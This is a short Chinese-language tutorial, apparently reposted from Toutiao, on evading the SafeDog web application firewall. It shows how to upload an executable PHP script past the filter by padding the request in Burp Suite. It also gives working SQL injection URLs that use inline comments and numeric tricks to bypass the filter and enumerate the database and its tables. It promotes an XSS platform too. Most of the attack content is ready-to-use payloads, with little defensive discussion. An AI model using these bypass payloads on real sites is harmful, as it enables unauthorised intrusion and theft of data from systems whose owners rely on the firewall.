| 关键词: localhost 安全 脚本 php 测试 rows http 学习 语句 123 |
推荐网站: 国内长度最短的XSS平台,支持https协议 ![]() 一,绕过安全狗上传可执行脚本附上php上传脚本源码,此源码未对上传文件类型做校验 ![]() ------------- ![]() 绕过方法,工具:burpsuite1,用 php脚本或者js,python等其他语言,生成48930个字符2,抓包,改包 ![]() 3,添加后如图: ![]() 4,查看当前目录,上传成功1 ![]() 二,sql注入绕过安全狗1,测试文件,明显的字符型 SQL注入----------------------------- ![]() 3,添加注入测试语句http://localhost/waf123.php?id=3' and 1=1 --+ ![]() 4,修改测试语句http://localhost/waf123.php?id=3'/*!and*/%202e1/**/=2e1--+ ![]() 5,暴库http://localhost/waf123.php?id=2e1'/*!and*/ 2e1/**/=2e1union(/*.1112*//**//*!*/(select@1/**/,2,database/**/(),4,5))--+ 6,爆表http://localhost/waf123.php?id=2e1'/*!and*/ 2e1/**/=2e1union(/*.1112*//**//*!*/(select@1/**/,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=0x74657374))--+ ![]() 上述内容不知道大家学习到了吗?网络世界的安全漏洞每天都会出现,安全知识和安全意识每个公民都应该了解和学习,有想学习网络安全技能的小伙伴可以随时私信我哦! |
| 本文出处: https://www.toutiao.com/a6803204449503281668/ |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|